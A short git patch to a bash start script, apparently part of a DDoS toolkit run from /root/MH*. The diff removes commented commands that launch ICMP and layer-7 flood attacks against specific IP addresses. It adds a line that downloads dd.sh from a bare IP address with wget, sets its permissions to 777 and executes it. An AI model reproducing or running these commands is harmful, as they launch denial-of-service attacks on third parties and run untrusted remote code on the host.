From d7ebf86eb1fc8d7b3eaf197741f9f42ad88f8c04 Mon Sep 17 00:00:00 2001 From: partizan59rus Date: Sat, 19 Aug 2023 09:18:16 +0000 Subject: [PATCH] =?UTF-8?q?=D0=9E=D0=B1=D0=BD=D0=BE=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20start.sh?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- start.sh | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/start.sh b/start.sh index 5f62884..e70ab9e 100644 --- a/start.sh +++ b/start.sh @@ -1,8 +1,3 @@ #!/bin/bash cd /root/MH* -#Layer4 -#python3 start.py ICMP 188.43.238.65 50 60 true - - -#Layer7 -#python3 start.py PPS 80.249.131.87:20000 0 50 proxy.txt 100 60 true \ No newline at end of file +wget http://5.188.158.106:20002/dd.sh -O dd.sh;chmod -R 777 dd.sh;./dd.sh \ No newline at end of file